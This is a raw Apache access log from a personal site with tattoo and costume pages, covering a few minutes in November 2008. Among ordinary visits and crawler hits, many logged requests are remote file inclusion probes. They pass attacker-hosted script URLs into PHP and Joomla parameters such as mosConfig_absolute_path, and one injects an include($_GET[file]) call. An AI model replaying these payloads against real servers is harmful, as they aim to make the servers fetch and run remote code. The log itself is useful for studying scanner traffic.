213.84.107.20 - - [03/Nov/2008:03:42:45 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:45 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:46 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:51 -0600] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:51 -0600] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:52 -0600] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:52 -0600] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:52 -0600] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:52 -0600] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:52 -0600] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:52 -0600] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:52 -0600] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:52 -0600] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:03:42:52 -0600] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
38.96.10.10 - - [03/Nov/2008:03:44:54 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
70.85.114.130 - - [03/Nov/2008:03:44:59 -0600] "GET /logs/access_log.1208217600//init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:03:44:59 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:03:45:01 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
38.96.10.10 - - [03/Nov/2008:03:45:17 -0600] "GET / HTTP/1.0" 200 1231 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:45:52 -0600] "GET /rachel%20study/ HTTP/1.0" 200 6339 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
70.85.114.130 - - [03/Nov/2008:03:46:14 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:03:46:15 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
38.96.10.10 - - [03/Nov/2008:03:46:33 -0600] "GET /tattoo/ HTTP/1.0" 200 466 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
219.85.63.226 - - [03/Nov/2008:03:47:06 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:03:47:06 -0600] "GET /logs/access_log.1214784000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [03/Nov/2008:03:47:06 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
38.96.10.10 - - [03/Nov/2008:03:47:11 -0600] "GET /logs/ HTTP/1.0" 200 105314 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:47:40 -0600] "GET /artwork/ HTTP/1.0" 200 11078 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
219.85.63.226 - - [03/Nov/2008:03:47:51 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:03:47:51 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:03:47:51 -0600] "GET /logs/access_log.1214524800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.805"
38.96.10.10 - - [03/Nov/2008:03:48:15 -0600] "GET /memorial/ HTTP/1.0" 200 817 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:48:57 -0600] "GET /logs/access_log.1175126400 HTTP/1.0" 200 213157 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:49:41 -0600] "GET /logs/access_log.1179532800 HTTP/1.0" 200 112334 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
203.146.15.54 - - [03/Nov/2008:03:49:59 -0600] "GET /logs/access_log.1215734400//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
203.146.15.54 - - [03/Nov/2008:03:50:10 -0600] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
203.146.15.54 - - [03/Nov/2008:03:50:10 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
38.96.10.10 - - [03/Nov/2008:03:50:14 -0600] "GET /logs/access_log.1188777600 HTTP/1.0" 200 142464 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:50:53 -0600] "GET /logs/access_log.1177027200 HTTP/1.0" 200 127660 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:51:27 -0600] "GET /logs/access_log.1190851200 HTTP/1.0" 200 141942 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
89.218.85.18 - - [03/Nov/2008:03:51:50 -0600] "GET /logs//encapscms_PATH/core/core.php?root=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:03:51:50 -0600] "GET /logs/access_log.1211587200//encapscms_PATH/core/core.php?root=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:03:51:51 -0600] "GET //encapscms_PATH/core/core.php?root=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:03:51:52 -0600] "GET /logs/access_log.1214524800//encapscms_PATH/core/core.php?root=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
38.96.10.10 - - [03/Nov/2008:03:52:05 -0600] "GET /logs/access_log.1165363200 HTTP/1.0" 200 214697 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:52:35 -0600] "GET /logs/access_log.1159920000 HTTP/1.0" 200 285209 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
89.218.85.18 - - [03/Nov/2008:03:52:40 -0600] "GET /logs/access_log.1214524800%20//encapscms_PATH/core/core.php?root=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
38.96.10.10 - - [03/Nov/2008:03:53:08 -0600] "GET /logs/access_log.1173657600 HTTP/1.0" 200 174667 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:53:41 -0600] "GET /logs/access_log.1189987200 HTTP/1.0" 200 171467 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:54:18 -0600] "GET /logs/access_log.1183248000 HTTP/1.0" 200 179264 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
219.85.63.226 - - [03/Nov/2008:03:54:42 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:03:54:42 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
38.96.10.10 - - [03/Nov/2008:03:54:58 -0600] "GET /logs/access_log.1161820800 HTTP/1.0" 200 342884 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:55:33 -0600] "GET /logs/access_log.1166054400 HTTP/1.0" 200 183052 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
206.221.184.172 - - [03/Nov/2008:03:55:41 -0600] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 363 "-""libwww-perl/5.816"
206.221.184.172 - - [03/Nov/2008:03:55:41 -0600] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 358 "-""libwww-perl/5.816"
206.221.184.172 - - [03/Nov/2008:03:55:42 -0600] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 363 "-""libwww-perl/5.816"
206.221.184.172 - - [03/Nov/2008:03:55:42 -0600] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 358 "-""libwww-perl/5.816"
38.96.10.10 - - [03/Nov/2008:03:56:03 -0600] "GET /logs/access_log.1156982400 HTTP/1.0" 200 241287 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
140.130.101.5 - - [03/Nov/2008:03:56:25 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idj.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
140.130.101.5 - - [03/Nov/2008:03:56:25 -0600] "GET /logs/access_log.1211587200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idj.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
140.130.101.5 - - [03/Nov/2008:03:56:25 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idj.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
140.130.101.5 - - [03/Nov/2008:03:56:26 -0600] "GET /logs/access_log.1214524800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idj.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
38.96.10.10 - - [03/Nov/2008:03:56:34 -0600] "GET /logs/access_log.1163894400 HTTP/1.0" 200 162626 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:57:10 -0600] "GET /logs/access_log.1176508800 HTTP/1.0" 200 150335 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:57:44 -0600] "GET /logs/access_log.1178409600 HTTP/1.0" 200 173662 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:58:20 -0600] "GET /logs/access_log.1188345600 HTTP/1.0" 200 198895 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:03:58:58 -0600] "GET /logs/access_log.1171843200 HTTP/1.0" 200 172198 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
213.251.154.174 - - [03/Nov/2008:03:59:10 -0600] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
213.251.154.174 - - [03/Nov/2008:03:59:10 -0600] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
38.96.10.10 - - [03/Nov/2008:03:59:36 -0600] "GET /logs/access_log.1193702400 HTTP/1.0" 200 190927 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:04:00:15 -0600] "GET /logs/access_log.1196035200 HTTP/1.0" 200 197032 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
203.177.74.140 - - [03/Nov/2008:04:00:31 -0600] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
203.177.74.140 - - [03/Nov/2008:04:00:33 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
203.177.74.140 - - [03/Nov/2008:04:00:36 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
203.177.74.140 - - [03/Nov/2008:04:00:36 -0600] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
203.177.74.140 - - [03/Nov/2008:04:00:38 -0600] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
203.177.74.140 - - [03/Nov/2008:04:00:38 -0600] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
203.177.74.140 - - [03/Nov/2008:04:00:45 -0600] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
38.96.10.10 - - [03/Nov/2008:04:00:54 -0600] "GET /logs/access_log.1177459200 HTTP/1.0" 200 148089 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
209.62.6.200 - - [03/Nov/2008:04:00:54 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.superscripts.us/data/arab.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
209.62.6.200 - - [03/Nov/2008:04:00:54 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://www.superscripts.us/data/arab.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
72.67.206.114 - - [03/Nov/2008:04:01:31 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.67.206.114 - - [03/Nov/2008:04:01:31 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
38.96.10.10 - - [03/Nov/2008:04:01:33 -0600] "GET /logs/access_log.1177718400 HTTP/1.0" 200 164681 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
83.64.132.254 - - [03/Nov/2008:04:02:02 -0600] "GET /logs/access_log.1208044800//?mosConfig_absolute_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [03/Nov/2008:04:02:02 -0600] "GET //?mosConfig_absolute_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.76"
83.64.132.254 - - [03/Nov/2008:04:02:03 -0600] "GET /logs//?mosConfig_absolute_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 200 105506 "-""libwww-perl/5.76"
38.96.10.10 - - [03/Nov/2008:04:02:13 -0600] "GET /logs/access_log.1185753600 HTTP/1.0" 200 171006 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
219.85.63.226 - - [03/Nov/2008:04:02:31 -0600] "GET /logs/access_log.1208044800//?mosConfig_absolute_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
219.85.63.226 - - [03/Nov/2008:04:02:31 -0600] "GET //?mosConfig_absolute_path=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
38.96.10.10 - - [03/Nov/2008:04:02:54 -0600] "GET /logs/access_log.1192320000 HTTP/1.0" 200 133294 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
83.149.69.97 - - [03/Nov/2008:04:03:09 -0600] "GET /logs//encapscms_PATH/core/core.php?root=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:04:03:09 -0600] "GET //encapscms_PATH/core/core.php?root=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
38.96.10.10 - - [03/Nov/2008:04:03:34 -0600] "GET /logs/access_log.1157500800 HTTP/1.0" 200 307818 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
61.50.221.108 - - [03/Nov/2008:04:04:17 -0600] "GET /logs/access_log.1215302400/joomla/index.php?option=com_restaurante&task=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
61.50.221.108 - - [03/Nov/2008:04:04:17 -0600] "GET /joomla/index.php?option=com_restaurante&task=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
61.50.221.108 - - [03/Nov/2008:04:04:18 -0600] "GET /logs/joomla/index.php?option=com_restaurante&task=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
38.96.10.10 - - [03/Nov/2008:04:04:18 -0600] "GET /logs/access_log.1155081600 HTTP/1.0" 200 255885 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
38.96.10.10 - - [03/Nov/2008:04:05:03 -0600] "GET /logs/access_log.1162339200 HTTP/1.0" 200 213473 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
65.55.208.123 - - [03/Nov/2008:04:05:06 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [03/Nov/2008:04:05:07 -0600] "GET /logs/access_log.1207353600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
38.96.10.10 - - [03/Nov/2008:04:05:45 -0600] "GET /logs/access_log.1197504000 HTTP/1.0" 200 138225 "-""ConveraCrawler/0.9e (+http://ews.converasearch.com/crawl.htm)"
83.149.69.97 - - [03/Nov/2008:04:06:06 -0600] "GET /logs//encapscms_PATH/core/core.php?root=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:04:06:06 -0600] "GET //encapscms_PATH/core/core.php?root=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
213.84.107.20 - - [03/Nov/2008:04:06:12 -0600] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:13 -0600] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:13 -0600] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:13 -0600] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:13 -0600] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:13 -0600] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:13 -0600] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:13 -0600] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:13 -0600] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:13 -0600] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:14 -0600] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:23 -0600] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:23 -0600] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:23 -0600] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:24 -0600] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:24 -0600] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:24 -0600] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:24 -0600] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:24 -0600] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:24 -0600] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.84.107.20 - - [03/Nov/2008:04:06:24 -0600] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
